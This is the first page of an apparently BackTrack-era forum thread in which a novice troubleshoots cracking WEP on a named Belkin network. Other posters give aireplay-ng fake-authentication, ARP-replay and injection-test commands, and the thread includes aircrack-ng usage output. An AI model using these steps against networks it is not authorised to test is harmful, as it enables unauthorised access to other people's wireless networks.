Page 1 of 3 123 LastLast
Results 1 to 10 of 25

Thread: Linksys WUSB54GC- don't send any packet

  1. #1
    Just burned his ISO
    Join Date
    Nov 2007
    Posts
    21

    Default Linksys WUSB54GC- don't send any packet

    Here is some informations
    ---------------------------------------------------------------------------------------------------------
    CH 1 ][ Elapsed: 9 mins ][ 2007-11-16 23:03

    BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:17:3FF:E1:09 -1 78 2090 0 0 1 54. WEP WEP OPN belkin54g

    BSSID STATION PWR Lost Packets Probes
    xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
    ---------------------------------------------------------------------------------------------------------
    bt ~ # aireplay-ng -1 0 -e belkin54g -a 00:17:3FF:E1:09 -h 00:11:22:33:44:55 rausb0
    22:55:09 Sending Authentication Request
    22:55:09 Authentication successful
    22:55:09 Sending Association Request
    22:55:14 Sending Authentication Request
    22:55:14 Authentication successful
    22:55:14 Sending Association Request
    22:55:14 Association successful :-)
    ---------------------------------------------------------------------------------------------------------
    bt ~ # aireplay-ng -3 -b 00:17:3FF:E1:09 -h 00:11:22:33:44:55 rausb0
    Saving ARP requests in replay_arp-1116-225554.cap
    You should also start airodump-ng to capture replies.
    Read 3678 packets (got 0 ARP requests), sent 0 packets...
    ---------------------------------------------------------------------------------------------------------
    And when I enter the last step. This show up

    aircrack-ng -n 64 --bssid 00:17:3FF:E1:09 xploitz.cap

    aircrack-ng: invalid option -- -

    Aircrack-ng 0.7 r214 - (C) 2006 Thomas d'Otreppe
    Original work: Christophe Devine


    usage: aircrack-ng [options] <.cap / .ivs file(s)>

    Common options:

    -a <amode> : force attack mode (1/WEP, 2/WPA-PSK)
    -e <essid> : target selection: network identifier
    -b <bssid> : target selection: access point's MAC
    -q : enable quiet mode (no status output)

    Static WEP cracking options:

    -c : search alpha-numeric characters only
    -t : search binary coded decimal chr only
    -h : search the numeric key for Fritz!BOX
    -d <mask> : debug - specify mask of the key (A1:XX:CF)
    -m <maddr> : MAC address to filter usable packets
    -n <nbits> : WEP key length : 64/128/152/256/512
    -i <index> : WEP key index (1 to 4), default: any
    -f <fudge> : bruteforce fudge factor, default: 2
    -k <korek> : disable one attack method (1 to 17)
    -x or -x0 : disable last keybytes bruteforce
    -x1 : enable last keybyte bruteforcing (default)
    -x2 : enable last two keybytes bruteforcing
    -X : disable bruteforce multithreading (SMP only)
    -y : experimental single bruteforce mode
    -s : show ASCII version of the key

    WEP and WPA-PSK cracking options:

    -w <words> : path to a dictionary file (multiple
    dictionnaries can be specified.
    See manpage for more information)
    ---------------------------------------------------------------------------------------------------------
    My question are:
    1.Line missing at the place where I put xxxxxxxxxxxxxxxxxxxxx
    2.How come there is only Read 3678 packets, BUT NO sent 0 packets??
    3.What Happen at the last step?
    4. How many packets need to read/ send inorder for me to crash wep?
    5. Where can I found the .cap??? I'm using a live CD.

    I'm using Linksys WUSB54GC, thanx in advance.

  2. #2
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    The program is reading packets to find a arp request. you have not captured a arp request therefore the program has nothing to inject there for your aircrack file is empty. Be more patient a wait or force a arp request.Better yet read up on address resolution protocol. If not you must try to forge your own packet with a -5 or -4 attack.

  3. #3
    Just burned his ISO
    Join Date
    Nov 2007
    Posts
    21

    Default

    I'm so sry, but can u please explain a little bit more? I'm very noob at this. again, so sry.

  4. #4
    Just burned his ISO
    Join Date
    Nov 2007
    Posts
    21

    Default

    Originally Posted by shamanvirtuel
    i advise aspj enhanced rt73 driver 1.1.0 (wich one i use)


    hxxp://homepages.tu-darmstadt.de/~p_...-1.1.0.tar.bz2

    for uninstall a driver :

    ifconfig rausb0 down-------> I enter this as command
    rmmod rt73----------------->I enter this as command

    cd to the module folder where you extracted the driver------>dont understand
    make && make install--------dont understand
    modprobe rt73----------command?

    ifconfig rausb0 up------command?

    can anyone please help explain little more on how to uninstall/install a driver?
    can anyone tell me what should my usb stick show after the installation of new driver?
    Thank you all

    By the way, can anyone also help answer my first question again? I don't understand much of purehate saids. thank you

  5. #5
    Senior Member PrairieFire's Avatar
    Join Date
    Apr 2007
    Posts
    705

    Default

    Quote Originally Posted by supersupernoobie View Post

    aircrack-ng -n 64 --bssid 00:17:3FF:E1:09 xploitz.cap

    aircrack-ng: invalid option -- -

    -b <bssid> : target selection: access point's MAC
    Your using the wrong parameters RTFM

    My question are:
    1.Line missing at the place where I put xxxxxxxxxxxxxxxxxxxxx
    ???

    2.How come there is only Read 3678 packets, BUT NO sent 0 packets??
    3.What Happen at the last step?
    Test to see if your injecting?

    4. How many packets need to read/ send inorder for me to crash wep?
    5. Where can I found the .cap??? I'm using a live CD.
    As many as it takes..., the same directory you started airodump-ng in...


    You should really do some reading here.
    Μολὼν λαβέ - Great spirits encounter heavy opposition from mediocre minds.

  6. #6
    Just burned his ISO
    Join Date
    Nov 2007
    Posts
    21

    Default

    How to test if I am injecting?

  7. #7
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    bt~#aireplay -9 ath0 (replace ath0 with your interface)

  8. #8
    Just burned his ISO
    Join Date
    Nov 2007
    Posts
    21

    Default

    aireplay -9 rausb0 doesnt work

  9. #9
    Developer
    Join Date
    Mar 2007
    Posts
    6,124

    Default

    Quote Originally Posted by supersupernoobie View Post
    aireplay -9 rausb0 doesnt work
    sorry aireplay-ng -9

  10. #10
    Just burned his ISO
    Join Date
    Nov 2007
    Posts
    21

    Default

    Thx for your help, but the thing is this show up after I enter aireplay-ng -9 rausb0
    aireplay-ng: invalid option -- 9

    Aireplay-ng 0.7 r214 - (C) 2006 Thomas d'Otreppe
    Original work: Christophe Devine


    usage: aireplay-ng <options> <replay interface>

    filter options:

    -b bssid : MAC address, Access Point
    -d dmac : MAC address, Destination
    -s smac : MAC address, Source
    -m len : minimum packet length
    -n len : maximum packet length
    -u type : frame control, type field
    -v subt : frame control, subtype field
    -t tods : frame control, To DS bit
    -f fromds : frame control, From DS bit
    -w iswep : frame control, WEP bit

    replay options:

    -x nbpps : number of packets per second
    -p fctrl : set frame control word (hex)
    -a bssid : set Access Point MAC address
    -c dmac : set Destination MAC address
    -h smac : set Source MAC address
    -e essid : fakeauth attack : set target AP SSID
    -j : arpreplay attack : inject FromDS pkts
    -g value : change ring buffer size (default: 8)
    -k IP : set destination IP in fragments
    -l IP : set source IP in fragments
    -o npckts : number of packets per burst (-1)
    -q sec : seconds between keep-alives (-1)
    -y prga : keystream for shared key auth

    source options:

    -i iface : capture packets from this interface
    -r file : extract packets from this pcap file

    attack modes (Numbers can still be used):

    --deauth count : deauthenticate 1 or all stations (-0)
    --fakeauth delay : fake authentication with AP (-1)
    --interactive : interactive frame selection (-2)
    --arpreplay : standard ARP-request replay (-3)
    --chopchop : decrypt/chopchop WEP packet (-4)
    --fragment : generates valid keystream (-5)

Page 1 of 3 123 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •